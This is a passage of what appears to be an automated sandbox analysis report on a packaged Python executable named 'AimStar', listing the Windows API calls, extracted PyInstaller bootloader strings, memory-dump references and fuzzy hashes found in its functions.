                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F459B5
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F459C7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                          • API String ID: 199729137-653951865
                                                                                                                                                                                                                                          • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                          • Instruction ID: 2f14c39f281cfab80866f9a7ba3ef68efb82656077ee610267cefe6c84663f76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85229138E0DF4BA1FA14BB55A8166B5A7ACAF05B71BC45136C85E42761FF3CB18CC260
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F49400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF710F445E4,00000000,00007FF710F41985), ref: 00007FF710F49439
                                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,00007FF710F488A7,?,?,00000000,00007FF710F43CBB), ref: 00007FF710F4821C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F42810: MessageBoxW.USER32 ref: 00007FF710F428EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                          • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                          • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                          • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                          • Instruction ID: b6d26ab03f23901deee33b40795c6571ce7bd6a2c21ff3994ccabad1336434ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74515235A1CE4251EB50BB25E853ABEA298AF947A0FC44431DE0EC27D5EE2CF54DC360
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                          • String ID: P%
                                                                                                                                                                                                                                          • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                          • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction ID: b7eca231638e3e1f5ba7d381d938b4126c3882f35701ec47ed7984308b3d99ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5351E836608BA186D6249F26A4181BAF7A1F798B61F404131EFDE83795DF3CE089D720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                          • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                          • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                          • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                          • Instruction ID: 271f43225315fbb57902a094c190d750cbadc835227f0e016bd32e2443c5b9d7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C21AB35B0CE4681E7416B7AA856579A358EF88BB0F884131DE2D833D5DE2CF5DAC320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: -$:$f$p$p
                                                                                                                                                                                                                                          • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                          • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                          • Instruction ID: b5ba3284893052e7ff98e22cb206361e043a0247dd3356c3e385f86d6f71e249
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A127066A0C94386FB207A14B156279B6B9FB48764FC44135E6A947BC4DF3CF688CB20
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: f$f$p$p$f
                                                                                                                                                                                                                                          • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                          • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                          • Instruction ID: 8fcf5eb3ddbe455194ae058d66137542549d630644bbf7affd90912af0b487e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF12C322E0C94386FB20BA55E05667AF679FB40764FC84135E69947BC4DB7CF688CB20
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          • Opcode ID: 53d1e4d2edf0062f7230160cf0d8e608199b832438cf6a3aedd647e8abf4d892
                                                                                                                                                                                                                                          • Instruction ID: 08dcf96e05720c10e5db8cf28e69652d89cfcbe5d6b1e84d60c8090fcd684549
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53d1e4d2edf0062f7230160cf0d8e608199b832438cf6a3aedd647e8abf4d892
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6414025B0CA5241EA10FB15A8029B9E3ACBF84BE4FD44532EE0D47795DE3CF549C760
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          • Opcode ID: 9c0a33a636d22d269d029a952bcb6a186b4f055325f6749c3ab7856a71983fc4
                                                                                                                                                                                                                                          • Instruction ID: 123a62a414823c4e96fb700e46b34fcb8be80b4484f9d6206dcf61333e7ba831
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c0a33a636d22d269d029a952bcb6a186b4f055325f6749c3ab7856a71983fc4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3417D35B0CA4685EA10EB21A4029F9E3A8BF847A4FC44432EE1D47B95DF3CF54AC724
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                                                                                          • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                          • Instruction ID: ba9606a0720221f5dedbac9e2a35ca0a34bbd462ca31193e3ed612490fa84e28
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EED18032A0CF4186EB20AF6594427ADB7A8FB557A8F900135EE4D97B95DF38F188C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42C9E
                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42D63
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF710F42D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                          • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                          • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                          • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                          • Instruction ID: 216ef6fa3523ed6eff54554195cb6d0f90483de71eba51f70b48dfb83722ca6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5231E936B0CE4142E620BB15A8056AAB7A9BF847E8F810135EF4D93759DF3CE54EC310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DDBD
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DDCB
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DDF5
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DE63
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DE6F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                          • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                          • Instruction ID: 853c3a26a537e7d2465522cde10f4a0b5f18e21b3eef837394acedc0993c0b6b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7316031B1EE4291EE12BB16A802965B39CBF58BB0F994535ED1D8B384DF3CF449C224
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                          • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                          • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                          • Instruction ID: 6cdda9dbe1ba3b20033d58d39b451a3c8e5bbe71f606a2f617c8e0659e527b87
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C415E35A0CE8691EA11FB20E4566E9A319FB48364FC00132EE5D83795EF3CF509C3A0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF710F4351A,?,00000000,00007FF710F43F23), ref: 00007FF710F42AA0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                          • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                          • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                          • Instruction ID: 0f0f0d5a9249bc98915b7cc3474f4b9a530fc357db95e0eb6dc3a63627fc87c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A21713261CB8152E660AB51B8427E6B398BB88794F800132EE8C93759DF3CE249C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
